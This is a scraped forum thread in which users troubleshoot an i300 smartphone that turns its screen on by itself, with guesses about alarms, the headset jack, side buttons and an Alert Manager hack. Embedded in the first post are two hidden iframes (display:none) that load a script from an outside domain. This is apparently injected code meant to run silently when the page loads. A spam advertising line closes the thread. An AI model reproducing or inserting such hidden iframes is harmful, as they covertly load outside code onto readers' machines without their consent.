+ Reply to Thread

ghost in the machine bug

has anyone experienced their i300's turning on by itself? usually happens around 10-15 seconds after you put the phone down. this has happened around ten times already, although it doesn't bother me; except when its real dark and then the blazingly bright screen turns on. shocking. man, you could almost use it as a flashlight.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Talking

I use mine as a flashlight sometimes!!!

But sorry never had that problem.

Administrator

Arrow

nope.. not me....

Yes, I think so

It's hard to tell, because it's the kind of thing I could be imagining. But there've been a couple times when I've looked down to see my screen on, and I thought I'd turned it off.

Did you transfer data from another Palm, BTW?

-dave

it might be reminders or alarms you have set.

The i300 also turns on whenever you plug something into the headset jack. I'm not quite sure of the rationale there, but you might want to check this if you were connected--or were going to connect--to a headset.

ps

vave, (or is it dave?)

yes, in fact i did transfer from my old visor, but i'm not sure what that would have to do with it...

i never set any alarms on my 300, so that wouldn't be the reason.

i'm now thinking that it might be b/c i'm hitting the side buttons without realizing it - those buttons are so sensitive.

This just started happening to me today, thought I was hitting buttons or something. I recently installed the Alert Manager Hack, although it worked fine for a few days, the hack apparently started to turn the unit on on its own. I changed the "seconds between alerts" from 30 to 60 and now the unit is working fine again. Check the thread about the alert manager hack.

I thought mine was host to a ghost once, it started talking to me. some how ringer was off, voice volume was on high and it got bumped when someone was calling and answered the phone.
    Gamefixx.com, A hardcore membership can save you big money